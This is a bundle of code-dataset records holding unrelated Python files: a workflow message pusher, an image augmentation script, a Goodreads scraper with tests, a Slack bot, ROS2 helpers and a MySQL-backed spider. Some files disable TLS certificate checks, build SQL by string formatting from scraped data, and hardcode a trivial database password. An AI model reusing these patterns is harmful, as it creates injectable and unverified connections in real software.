'参与者姓名',\n a.displayName AS '活动显示名称',\n #a.ActionName AS '操作名称',\n IF(a.ActionName='' AND a.approval!=0,'Submit',a.ActionName) AS '操作名称', \n a.itemComment AS '当前征询意见填写的意见',\n a.finishtime AS '接受时间',\n e.id AS '扩展表主键',\n a.objectid as 'OBJECTID',\n a.InstanceId as 'instanceId'\n FROM ot_workitemfinished a,\n ot_instancecontext b,\n ot_workitemfinished_ext e \n WHERE a.InstanceId=b.objectid \n AND e.task_id= a.objectID \n AND a.FinishTime>'2019-07-15'\n AND b.workflowcode LIKE 'hsh_%'\n AND e.isSend='N' \n order by a.finishtime \n \"\"\"\n\n cr.execute(sql)\n rs = cr.fetchall()\n for i in list(rs):\n n_relationId = get_relationId(config, i[1],i[3])\n v_itemComment = get_itemComment(config, i[10])\n message = {\n 'relationId' : n_relationId,\n 'state' : i[2],\n 'workflowCode' : i[0],\n 'participantName': i[4],\n 'displayName' : i[5],\n 'actionName' : i[6],\n 'itemComment' : v_itemComment, #i[7]\n 'receiveTime' : str(i[8]),\n 'instanceId' : str(i[11])\n }\n\n v_message = json.dumps(message)\n print('v_message=',v_message)\n\n values = {\n 'message': v_message\n }\n\n #调用接口推送消息\n n_failure_time = 0\n while True:\n try:\n url = config['hopson_interface']\n context = ssl._create_unverified_context()\n data = urllib.parse.urlencode(values).encode(encoding='UTF-8')\n print('data=',data)\n req = urllib.request.Request(url,data=data)\n res = urllib.request.urlopen(req,context=context)\n res = json.loads(res.read())\n print(res,res['code'])\n if res['code'] == 200:\n print('接口调用成功!')\n cr.execute(\"update ot_workitemfinished_ext t set isSend='Y' where id={0}\".format(i[9]))\n db.commit()\n print('扩展表状态更新成功!')\n n_failure_time=0\n break\n else:\n print(res['msg'])\n break\n except:\n print(traceback.format_exc())\n print('接口调用失败,第{0}次重试中...!'.format(str(n_failure_time+1)))\n n_failure_time = n_failure_time + 1\n time.sleep(60)\n time.sleep(5)\n cr.close()\n\n#查询是否有加载待办任务扩展信息\ndef get_undone_task_ext(config):\n db=get_db_mysql(config)\n cr=db.cursor()\n sql='''select count(0)\n FROM ot_workitemfinished t\n WHERE t.receiveTime>='2019-07-03'\n AND t.workflowcode LIKE 'hsh%'\n AND NOT EXISTS(SELECT 1 FROM ot_workitemfinished_ext e\n WHERE e.task_id= t.objectID)\n '''\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n return rs[0]\n\n#加载待办任务至扩展表【合生通】\ndef write_undone_task_ext(config):\n db=get_db_mysql(config)\n cr=db.cursor()\n if get_undone_task_ext(config)==0:\n print('未找到新的待办任务!')\n else:\n sql='''INSERT INTO ot_workitemfinished_ext(inst_id,task_id) \n SELECT t.instanceid, t.objectID\n FROM ot_workitemfinished t\n WHERE t.receiveTime>='2019-07-03'\n AND t.workflowcode LIKE 'hsh%'\n AND NOT EXISTS(SELECT 1 FROM ot_workitemfinished_ext e\n WHERE e.task_id= t.objectID)\n '''\n cr.execute(sql)\n db.commit()\n print('采集到新的待办任务!')\n cr.close()\n\n#消息推送\ndef push(config,debug):\n #循环临听待办任务表变化,变更新扩展表进行消息推送处理\n while True:\n #将未推送消息待办任务写入扩展表\n write_undone_task_ext(config)\n #推送合生通消息\n send_message_easylife(config,debug)\n #休眠\n print('休眠 {0}秒...'.format(config['send_gap']))\n time.sleep(int(config['send_gap']))\n\ndef main():\n #init variable\n config = \"\"\n debug = False\n warnings.filterwarnings(\"ignore\")\n #get parameter from console\n for p in range(len(sys.argv)):\n if sys.argv[p] == \"-conf\":\n config = sys.argv[p + 1]\n elif sys.argv[p] == \"-debug\":\n debug = True\n\n #初始化\n config=init(config)\n\n #process\n push(config,debug)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"h3bpm_sender/h3bpm_easylife_sender_gray/h3bpm_easylife_sender.py","file_name":"h3bpm_easylife_sender.py","file_ext":"py","file_size_in_byte":11721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"286635707","text":"\r\n'''\r\nO código inicial para a parte de data augentation foi retirado deste site:\r\nhttp://sigmoidal.ai/reduzindo-overfitting-com-data-augmentation/\r\ne feitas algumas adaptações\r\n'''\r\n\r\n# importar os pacotes necessários\r\nimport numpy as np\r\nfrom keras.preprocessing.image import load_img\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom os import listdir\r\nimport os\r\n\r\npastas = [arq for arq in listdir(\"caracteres/\")]\r\n\r\nfor pasta in pastas:\r\n\r\n\r\n\tarquivos = [arq for arq in listdir(\"caracteres/\"+pasta+\"/\")]\r\n\tos.mkdir(\"aumenta/\"+pasta)\r\n\timagens = [arq for arq in arquivos if arq.lower().endswith(\".jpg\")]\r\n\timagensCriadas=0\r\n\r\n\tnumeroDeImagens=len(imagens)\r\n\r\n\tif numeroDeImagens<30:\r\n\t\treplicas=25\r\n\telif numeroDeImagens<40:\r\n\t\treplicas=17\r\n\telif numeroDeImagens<50:\r\n\t\treplicas=13\r\n\telif numeroDeImagens<60:\r\n\t\treplicas=10\r\n\telif numeroDeImagens<80:\r\n\t\treplicas=9\r\n\r\n\telif numeroDeImagens<90:\r\n\t\treplicas=6\r\n\r\n\telif numeroDeImagens<110:\r\n\t\treplicas=5\r\n\r\n\telif numeroDeImagens<150:\r\n\t\treplicas=4\r\n\r\n\telif numeroDeImagens<210:\r\n\t\treplicas=3\r\n\r\n\telif numeroDeImagens<270:\r\n\t\treplicas=2\r\n\r\n\telse:\r\n\t\treplicas=1\r\n\r\n\tfor imagemCaracter in imagens:\r\n\t\t# definir caminhos da imagem original e diretório do output\r\n\t\tIMAGE_PATH = \"caracteres/\"+pasta+\"/\"+imagemCaracter\r\n\t\tOUTPUT_PATH = \"aumenta/\"+pasta+\"/\"\r\n\t\t \r\n\t\t# carregar a imagem original e converter em array\r\n\t\timage = load_img(IMAGE_PATH)\r\n\t\timage = img_to_array(image)\r\n\t\t \r\n\t\t# adicionar uma dimensão extra no array\r\n\t\timage = np.expand_dims(image, axis=0)\r\n\t\t \r\n\t\t# criar um gerador (generator) com as imagens do\r\n\t\t# data augmentation\r\n\t\timgAug = ImageDataGenerator( rotation_range=8,\r\n\t\t\t\t\t\tzoom_range=[0.9,1.0],\r\n\t\t\t\t\t\t\t\t\tbrightness_range=[0.1,3],\r\n\t\t\t\t fill_mode='nearest', horizontal_flip=False)\r\n\t\timgGen = imgAug.flow(image, save_to_dir=OUTPUT_PATH,\r\n\t\t\t\t save_format='jpg', save_prefix='0000001')\r\n\r\n\t\t# gerar 10 imagens por data augmentation\r\n\t\tcounter = 0\r\n\t\tfor (i, newImage) in enumerate(imgGen):\r\n\t\t\tcounter += 1\r\n\t\t\timagensCriadas+=1\r\n\r\n\t\t\t# ao gerar 10 imagens, parar o loop\r\n\t\t\tif counter == replicas:\r\n\t\t\t\tbreak\r\n\r\n\t\tif imagensCriadas>500:\r\n\t\t\tbreak\r\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597166420","text":"# coding: utf8\n\nfrom com.handler.base_handler import BaseHandler\nfrom com.manager.article_manager import ArticleManager\nfrom com.manager.category_manager import CategoryManager\nimport com.util.constant as constant\n\nclass MainHandler(BaseHandler):\n \n __article_manager = ArticleManager()\n __category_manager = CategoryManager()\n \n def __init__(self, *args, **argkw):\n super(MainHandler, self).__init__(*args, **argkw)\n self.article_manager = self.__article_manager\n self.category_manager = self.__category_manager\n \n def get(self, param=None):\n try:\n page = int(self.get_argument('page', 1))\n except:\n page = 1\n \n start_index = (page - 1) * constant.PAGE_SIZE\n \n # 获取所有目录\n cats = self.category_manager.get_category()\n \n # 取前5篇最新的文章 \n articles = self.article_manager.get_article(start_index=start_index, count=constant.PAGE_SIZE)\n target_index = 'index.html'\n if self.get_platform() != 'PC':\n target_index = 'index_mobile.html' \n self.render(target_index, cats=cats, articles=articles, current_page=page)\n","sub_path":"com/handler/main_handler.py","file_name":"main_handler.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"362695902","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport csv\nimport unittest\n\n#Worked with: Grace Coleman and Zita Jameson\n\n\ndef get_titles_from_search_results(filename):\n \"\"\"\n Write a function that creates a BeautifulSoup object on \"search_results.htm\". Parse\n through the object and return a list of tuples containing book titles (as printed on the Goodreads website) \n and authors in the format given below. Make sure to strip() any newlines from the book titles and author names.\n\n [('Book title 1', 'Author 1'), ('Book title 2', 'Author 2')...]\n \"\"\"\n f=open(filename, 'r')\n fileData= f.read()\n f.close()\n\n soup= BeautifulSoup(fileData, 'lxml')\n bookTitles= soup.find_all('a', class_= 'bookTitle')\n bookInfo= []\n for tag in bookTitles:\n bookInfo.append(tag.text.strip())\n authorsList=[]\n authorTags=soup.find_all('div', class_='authorName__container')\n for item in authorTags:\n authorsList.append(item.text.strip())\n information=[]\n for i in range(len(bookTitles)):\n tup=(bookInfo[i], authorsList[i])\n information.append(tup)\n return information\n\n\ndef get_search_links(): \n \"\"\"\n Write a function that creates a BeautifulSoup object after retrieving content from\n \"https://www.goodreads.com/search?q=fantasy&qid=NwUsLiA2Nc\". Parse through the object and return a list of\n URLs for each of the first ten books in the search using the following format:\n\n ['https://www.goodreads.com/book/show/84136.Fantasy_Lover?from_search=true&from_srp=true&qid=NwUsLiA2Nc&rank=1', ...]\n\n Notice that you should ONLY add URLs that start with \"https://www.goodreads.com/book/show/\" to \n your list, and , and be sure to append the full path to the URL so that the url is in the format \n “https://www.goodreads.com/book/show/kdkd\".\n\n \"\"\"\n\n url_lst= []\n url= 'https://www.goodreads.com/search?q=fantasty&qid=NwUsLiA2Nc'\n r=requests.get(url)\n soup= BeautifulSoup(r.text, 'html.parser')\n anchor= soup.find_all('a', class_= 'bookTitle')\n for x in anchor:\n link= x['href']\n if link.startswith('/book/show/'):\n i='https://www.goodreads.com'+ str(link)\n url_lst.append(i)\n return url_lst[:10]\n \ndef get_book_summary(book_url):\n \"\"\"\n Write a function that creates a BeautifulSoup object that extracts book\n information from a book's webpage, given the URL of the book. Parse through\n the BeautifulSoup object, and capture the book title, book author, and number \n of pages. This function should return a tuple in the following format:\n\n ('Some book title', 'the book's author', number of pages)\n\n HINT: Using BeautifulSoup's find() method may help you here.\n You can easily capture CSS selectors with your browser's inspector window.\n Make sure to strip() any newlines from the book title and number of pages.\n \"\"\"\n r=requests.get(book_url)\n soup= BeautifulSoup(r.text, 'lxml')\n anchor= soup.find('h1', class_='gr-h1 gr-h1--serif')\n\n title= anchor.text.strip()\n anchor2=soup.find('a', class_='authorName')\n\n author= anchor2.text.strip()\n anchor3= soup.find('span', itemprop='numberOfPages')\n page_count= int(anchor3.text.strip(' pages'))\n tup= (title, author, page_count)\n return tup\n\n \n\ndef summarize_best_books(filepath):\n \"\"\"\n Write a function to get a list of categories, book title and URLs from the \"BEST BOOKS OF 2020\"\n page in \"best_books_2020.htm\". This function should create a BeautifulSoup object from a \n filepath and return a list of (category, book title, URL) tuples.\n \n For example, if the best book in category \"Fiction\" is \"The Testaments (The Handmaid's Tale, #2)\", with URL\n https://www.goodreads.com/choiceawards/best-fiction-books-2020, then you should append \n (\"Fiction\", \"The Testaments (The Handmaid's Tale, #2)\", \"https://www.goodreads.com/choiceawards/best-fiction-books-2020\") \n to your list of tuples.\n \"\"\"\n clist=[]\n blist=[]\n ulist=[]\n tups=[]\n\n file1= open(filepath, 'r')\n data= file1.read()\n file1.close()\n soup=BeautifulSoup(data, \"html.parser\")\n cats=soup.find_all('h4', class_= 'category__copy')\n for category in cats:\n clist.append(category.text.strip())\n bestb=soup.find_all('img', class_= \"category__winnerImage\")\n for book in bestb:\n title=book['alt']\n blist.append(title)\n urls= soup.find_all('div', class_= 'category clearFix')\n for url in urls:\n ulist.append(url.find('a')['href'])\n for x in range(len(ulist)):\n tup= (clist[x],blist[x], ulist[x])\n tups.append(tup)\n return tups\n\n\ndef write_csv(data, filename):\n \"\"\"\n Write a function that takes in a list of tuples (called data, i.e. the\n one that is returned by get_titles_from_search_results()), writes the data to a \n csv file, and saves it to the passed filename.\n\n The first row of the csv should contain \"Book Title\" and \"Author Name\", and\n respectively as column headers. For each tuple in data, write a new\n row to the csv, placing each element of the tuple in the correct column.\n\n When you are done your CSV file should look like this:\n\n Book title,Author Name\n Book1,Author1\n Book2,Author2\n Book3,Author3\n ......\n\n This function should not return anything.\n \"\"\"\n with open(filename, 'w', newline='', encoding='utf-8') as f:\n f= csv.writer(f, delimiter=',')\n f.writerow(['Book title', \"Author Name\"])\n for line in data:\n f.writerow(line)\n\n\ndef extra_credit(filepath):\n \"\"\"\n EXTRA CREDIT\n\n Please see the instructions document for more information on how to complete this function.\n You do not have to write test cases for this function.\n \"\"\"\n pass\n\nclass TestCases(unittest.TestCase):\n\n # call get_search_links() and save it to a static variable: search_urls\n\n\n def test_get_titles_from_search_results(self):\n # call get_titles_from_search_results() on search_results.htm and save to a local variable\n search_urls=get_titles_from_search_results('search_results.htm')\n # check that the number of titles extracted is correct (20 titles)\n self.assertEqual(len(search_urls), 20)\n # check that the variable you saved after calling the function is a list\n self.assertIsInstance(search_urls, list)\n # check that each item in the list is a tuple\n for x in search_urls:\n self.assertIsInstance(x, tuple)\n # check that the first book and author tuple is correct (open search_results.htm and find it)\n self.assertEqual(search_urls[0], (\"Harry Potter and the Deathly Hallows (Harry Potter, #7)\", 'J.K. Rowling'))\n # check that the last title is correct (open search_results.htm and find it)\n self.assertEqual(search_urls[-1][0], 'Harry Potter: The Prequel (Harry Potter, #0.5)')\n \n def test_get_search_links(self):\n # check that TestCases.search_urls is a list\n search_urls=get_search_links()\n # check that the length of TestCases.search_urls is correct (10 URLs)\n self.assertEqual(len(search_urls), 10)\n\n # check that each URL in the TestCases.search_urls is a string\n for x in search_urls:\n self.assertIsInstance(x, str)\n # check that each URL contains the correct url for Goodreads.com followed by /book/show/\n for x in search_urls:\n self.assertTrue(\"/book/show/\" in x)\n\n def test_get_book_summary(self):\n # create a local variable – summaries – a list containing the results from get_book_summary()\n # for each URL in TestCases.search_urls (should be a list of tuples)\n search_urls= get_search_links()\n summaries=[]\n for url in search_urls:\n summaries.append(get_book_summary(url))\n\n \n\n\n # check that the number of book summaries is correct (10)\n self.assertEqual(len(summaries), 10)\n # check that each item in the list is a tuple\n for x in summaries:\n self.assertEqual(type(x), tuple)\n self.assertEqual(len(x), 3)\n \n # check that each tuple has 3 elements\n\n # check that the first two elements in the tuple are string\n self.assertIsInstance(summaries[0][0], str)\n self.assertIsInstance(summaries[0][1], str) \n # check that the third element in the tuple, i.e. pages is an int\n self.assertIsInstance(summaries[0][2], int)\n # check that the first book in the search has 337 pages\n self.assertEqual(summaries[0][2], 337)\n\n def test_summarize_best_books(self):\n # call summarize_best_books and save it to a variable\n summarize=summarize_best_books('best_books_2020.htm')\n # check that we have the right number of best books (20)\n self.assertEqual(len(summarize), 20)\n # assert each item in the list of best books is a tuple\n for x in summarize:\n self.assertEqual(type(x), tuple)\n self.assertEqual(len(x), 3)\n # check that each tuple has a length of 3\n\n # check that the first tuple is made up of the following 3 strings:'Fiction', \"The Midnight Library\", 'https://www.goodreads.com/choiceawards/best-fiction-books-2020'\n self.assertEqual(summarize[0], ('Fiction', \"The Midnight Library\", 'https://www.goodreads.com/choiceawards/best-fiction-books-2020'))\n # check that the last tuple is made up of the following 3 strings: 'Picture Books', 'Antiracist Baby', 'https://www.goodreads.com/choiceawards/best-picture-books-2020'\n self.assertEqual(summarize[-1],('Picture Books', 'Antiracist Baby', 'https://www.goodreads.com/choiceawards/best-picture-books-2020'))\n\n def test_write_csv(self):\n # call get_titles_from_search_results on search_results.htm and save the result to a variable\n titles=get_titles_from_search_results('search_results.htm')\n # call write csv on the variable you saved and 'test.csv'\n write_csv(titles, 'test.csv')\n # read in the csv that you wrote (create a variable csv_lines - a list containing all the lines in the csv you just wrote to above)\n\n csv_lines=[]\n with open('test.csv') as file:\n csv_f= csv.reader(file)\n for x in csv_f:\n csv_lines.append(x)\n # check that there are 21 lines in the csv\n self.assertEqual(len(csv_lines), 21)\n # check that the header row is correct\n self.assertEqual(csv_lines[0], [\"Book title\", \"Author Name\"])\n # check that the next row is 'Harry Potter and the Deathly Hallows (Harry Potter, #7)', 'J.K. Rowling'\n self.assertEqual(csv_lines[1], ['Harry Potter and the Deathly Hallows (Harry Potter, #7)', 'J.K. Rowling'])\n # check that the last row is 'Harry Potter: The Prequel (Harry Potter, #0.5)', 'Julian Harrison (Introduction)'\n self.assertEqual(csv_lines[-1], ['Harry Potter: The Prequel (Harry Potter, #0.5)', 'Julian Harrison (Introduction)'])\n\nif __name__ == '__main__':\n print(extra_credit(\"extra_credit.htm\"))\n unittest.main(verbosity=2)","sub_path":"Project2.py","file_name":"Project2.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"1117896","text":"from django.contrib import admin\n\nfrom home.models import Setting, ContactFormMessage, UserProfile, FAQ\n\n\nclass ContactFormMessageAdmin(admin.ModelAdmin):\n list_display = ['name','email','subject','status']\n list_filter = ['status']\nclass UserProfileAdmin(admin.ModelAdmin):\n list_display = ['user','phone','university','image_tag']\n list_filter = ['university']\nclass FaqAdmin(admin.ModelAdmin):\n list_display = ['ordernumber', 'question', 'answer', 'status']\n list_filter = ['status']\nadmin.site.register(Setting)\nadmin.site.register(ContactFormMessage,ContactFormMessageAdmin)\nadmin.site.register(UserProfile,UserProfileAdmin)\nadmin.site.register(FAQ,FaqAdmin)","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"268687772","text":"import re\r\nimport time\r\nfrom slackclient import SlackClient\r\n\r\n\r\n# instantiate Slack client\r\nslack_client = SlackClient('your bot token goes here')\r\n\r\n# constants\r\nRTM_READ_DELAY = 1 # 1 second delay between reading from RTM\r\nEXAMPLE_COMMAND = \"Question:\"\r\nEXAMPLE_COMMAND2 = \"yes\"\r\nEXAMPLE_COMMAND3 = \"no\"\r\nEXAMPLE_COMMAND4 = \"answer:\"\r\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\r\n\r\n\r\n\r\n\r\ndef parse_bot_commands(slack_events):\r\n \"\"\"\r\n Parses a list of events coming from the Slack RTM API to find bot commands.\r\n If a bot command is found, this function returns a tuple of command and channel.\r\n If its not found, then this function returns None, None.\r\n \"\"\"\r\n for event in slack_events:\r\n if event[\"type\"] == \"message\" and not \"subtype\" in event:\r\n user_id, message = parse_direct_mention(event[\"text\"])\r\n if user_id == starterbot_id:\r\n return message, event[\"channel\"]\r\n return None, None\r\n\r\ndef parse_direct_mention(message_text):\r\n \"\"\"\r\n Finds a direct mention (a mention that is at the beginning) in message text\r\n and returns the user ID which was mentioned. If there is no direct mention, returns None\r\n \"\"\"\r\n matches = re.search(MENTION_REGEX, message_text)\r\n # the first group contains the username, the second group contains the remaining message\r\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)\r\n\r\ndef define_question(command):\r\n global question \r\n question = command\r\n\r\ndef handle_command(command, channel):\r\n \r\n \"\"\"\r\n Executes bot command if the command is known\r\n \"\"\"\r\n if channel == \"Questions channel id\":\r\n answer = \"Not sure what you mean. Try *{}*\".format(EXAMPLE_COMMAND)\r\n if command.startswith(EXAMPLE_COMMAND):\r\n answer = \"Sending your question to specialists!\"\r\n define_question(command)\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=\"#canal0\",\r\n text=\"New {} do you know how to answer it? (Say yes or no)\".format(command)\r\n )\r\n if command.startswith(EXAMPLE_COMMAND2):\r\n answer = \"Thanks for the feedback :heart:\"\r\n if command.startswith(EXAMPLE_COMMAND3):\r\n answer = \"Sorry for that , fell free to send me another question!\"\r\n if channel == \"channel0 id\":\r\n answer = \"Not sure what you mean. Try *{}* or *{}*.\".format(EXAMPLE_COMMAND2,EXAMPLE_COMMAND3)\r\n if command.startswith(EXAMPLE_COMMAND2):\r\n answer = \"Waiting for your answer (use {} to respond), Thank you!\".format(EXAMPLE_COMMAND4)\r\n if command.startswith(EXAMPLE_COMMAND3):\r\n answer = \"Sending question to next channel...\"\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=\"#canal1\",\r\n text=\"New {} do you know how to answer it? (Say yes or no)\".format(question)\r\n )\r\n #send to next channel\r\n if command.startswith(EXAMPLE_COMMAND4):\r\n answer = \"Sending your answer for the requester, Thank you! :heart: \"\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=\"#python-bot\",\r\n text=\"{} is this answer satisfactory? (say *yes* ou *no*)\".format(command)\r\n )\r\n if channel == \"channel1 id\":\r\n answer = \"Not sure what you mean. Try *{}* or *{}*.\".format(EXAMPLE_COMMAND2,EXAMPLE_COMMAND3)\r\n if command.startswith(EXAMPLE_COMMAND2):\r\n answer = \"Waiting for your answer (use {} to respond), Thank you!\".format(EXAMPLE_COMMAND4)\r\n if command.startswith(EXAMPLE_COMMAND3):\r\n answer = \"Sending question to next channel...\"\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=\"#canal2\",\r\n text=\"New {} do you know how to answer it? (Say yes or no)\".format(question)\r\n )\r\n if command.startswith(EXAMPLE_COMMAND4):\r\n answer = \"Sending your answer for the requester, Thank you! :heart: \"\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=\"#python-bot\",\r\n text=\"{} is this answer satisfactory? (say *yes* ou *no*)\".format(command)\r\n )\r\n \r\n\r\n # Sends the answer back to the channel\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=channel,\r\n text=answer\r\n )\r\n\r\nif __name__ == \"__main__\":\r\n if slack_client.rtm_connect(with_team_state=False):\r\n print(\"Starter Bot connected and running!\")\r\n\r\n # Read bot's user ID by calling Web API method `auth.test`\r\n starterbot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\r\n while True:\r\n command, channel = parse_bot_commands(slack_client.rtm_read())\r\n if command:\r\n handle_command(command, channel)\r\n time.sleep(RTM_READ_DELAY)\r\n else:\r\n print(\"Connection failed. Exception traceback printed above.\")","sub_path":"code/slackbot-en.py","file_name":"slackbot-en.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"75470745","text":"# Copyright 2019 Open Source Robotics Foundation, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\n\nfrom ament_index_python import get_resource\nfrom ament_index_python import get_resources\nfrom ament_index_python import has_resource\n\nfrom rosidl_runtime_py import utilities\nfrom rosidl_runtime_py.convert import message_to_yaml\n\n\ndef get_all_interface_packages():\n return get_resources('rosidl_interfaces')\n\n\ndef get_interfaces(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package {}'.format(package_name))\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n return list(sorted({\n n.rsplit('.', 1)[0]\n for n in interface_names\n if '_' not in n}))\n\n\ndef get_interface_path(parts):\n prefix_path = has_resource('packages', parts[0])\n joined = '/'.join(parts)\n if len(parts[-1].rsplit('.', 1)) == 1:\n joined += '.idl'\n interface_path = os.path.join(\n prefix_path, 'share', joined)\n if not os.path.exists(interface_path):\n raise LookupError('Could not find the interface {!r}'.format(interface_path))\n return interface_path\n\n\ndef package_name_completer(**kwargs):\n \"\"\"Callable returning a list of types containing messages, services, and action.\"\"\"\n return get_all_interface_packages()\n\n\ndef type_completer(**kwargs):\n \"\"\"Callable returning a list of message, service, and action types.\"\"\"\n types = []\n for package_name, service_names in get_all_service_types().items():\n for service_name in service_names:\n types.append(\n '{package_name}/srv/{service_name}'.format_map(locals()))\n\n for package_name, message_names in get_all_message_types().items():\n for message_name in message_names:\n types.append(\n '{package_name}/msg/{message_name}'.format_map(locals()))\n\n for package_name, action_names in get_all_action_types().items():\n for action_name in action_names:\n types.append(\n '{package_name}/action/{action_name}'.format_map(locals()))\n\n return sorted(types)\n\n\ndef get_all_action_types():\n all_action_types = {}\n for package_name in get_resources('rosidl_interfaces'):\n action_types = get_action_types(package_name)\n if action_types:\n all_action_types[package_name] = action_types\n return all_action_types\n\n\ndef get_action_types(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package name')\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n # TODO(jacobperron) this logic should come from a rosidl related package\n # Only return actions in action folder\n return list(sorted({\n n[7:].rsplit('.', 1)[0]\n for n in interface_names\n if n.startswith('action/') and (n[-4:] == '.idl' or n[-7:] == '.action')}))\n\n\ndef get_all_message_types():\n all_message_types = {}\n for package_name in get_resources('rosidl_interfaces'):\n message_types = get_message_types(package_name)\n if message_types:\n all_message_types[package_name] = message_types\n return all_message_types\n\n\ndef get_message_types(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package name')\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n # TODO(dirk-thomas) this logic should come from a rosidl related package\n # Only return messages in msg folder\n return list(sorted({\n n[4:-4]\n for n in interface_names\n if n.startswith('msg/') and n[-4:] in ('.idl', '.msg')}))\n\n\ndef get_all_service_types():\n all_service_types = {}\n for package_name in get_resources('rosidl_interfaces'):\n service_types = get_service_types(package_name)\n if service_types:\n all_service_types[package_name] = service_types\n return all_service_types\n\n\ndef get_service_types(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package name')\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n # TODO(dirk-thomas) this logic should come from a rosidl related package\n # Only return services in srv folder\n return list(sorted({\n n[4:-4]\n for n in interface_names\n if n.startswith('srv/') and n[-4:] in ('.idl', '.srv')}))\n\n\ndef get_message_path(package_name, message_name):\n message_types = get_message_types(package_name)\n if message_name not in message_types:\n raise LookupError('Unknown message name')\n prefix_path = has_resource('packages', package_name)\n # TODO(dirk-thomas) this logic should come from a rosidl related package\n return os.path.join(\n prefix_path, 'share', package_name, 'msg', message_name + '.msg')\n\n\ndef interface_to_yaml(identifier):\n interface = utilities.get_interface(identifier)\n if utilities.is_action(interface):\n instance = interface.Goal()\n elif utilities.is_service(interface):\n instance = interface.Request()\n else:\n instance = interface()\n\n return message_to_yaml(instance)\n","sub_path":"ros2interface/ros2interface/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294764493","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pymysql\n\nclass bookSpider(object):\n def __init__(self,url):\n self.url=url;\n self.headers={\n 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\n 'Referer': 'http://i.meizitu.net'\n }\n def getHtml(self):\n res=requests.get(self.url,self.headers)\n soup=BeautifulSoup(res.text,\"lxml\")\n tt=soup.select('body > div:nth-child(5) > div.firs.d.l.topk > div.topli > ul > li>a')\n for url in tt:\n dmurl=\"http://www.fengchedm.com\"+url.get('href')\n title=url.get('title')\n print(dmurl,title)\n self.saveDb(dmurl,title)\n\n def saveDb(self, dmurl,title):\n db = pymysql.connect('localhost', 'root', '123456', 'pyData')\n cursor = db.cursor()\n sql = \"insert into dmlist(dmurl,title)\" \\\n \"values ('%s','%s')\" % (dmurl,title)\n try:\n cursor.execute(sql)\n db.commit()\n except:\n db.rollback()\n cursor.close()\n\ndef createDb():\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"pyData\")\n\n cursor = db.cursor()\n # 如果数据表已经存在使用 execute() 方法删除表。\n cursor.execute(\"DROP TABLE IF EXISTS dmlist\")\n\n # 创建数据表SQL语句\n sql = \"\"\"CREATE TABLE dmlist (\n ID integer (255) NOT NULL AUTO_INCREMENT primary key,\n dmurl varchar (255),\n titile varchar (255)\n )\"\"\"\n\n cursor.execute(sql)\n\n # 关闭数据库连接\n db.close()\n\ndef main():\n base_url=\"http://www.fengchedm.com/paiming/137.html\"\n bookspider=bookSpider(base_url)\n bookspider.getHtml()\nif __name__ == '__main__':\n main()","sub_path":"booktest.py","file_name":"booktest.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"502802980","text":"import pprint\nimport unittest\n\nimport numpy\nimport skil_client\nfrom skil_client import *\nfrom skil_client.rest import ApiException\n\ndebug = False\n\nhost = \"localhost\" # Rename this to the host you are using \n\nconfig = Configuration()\nconfig.host = \"{}:9008\".format(host) # change this if you're using a different port number for the general API!\nconfig.debug = debug\napi_client = ApiClient(configuration=config)\n# create an instance of the API class\napi_instance = skil_client.DefaultApi(api_client=api_client)\n\nconfig_mh = Configuration()\nconfig_mh.host = \"{}:9100\".format(host) # change this if you're using a different port number for the model server!\nconfig_mh.debug = debug\napi_client_mh = ApiClient(configuration=config_mh)\n# create an instance of the Model History 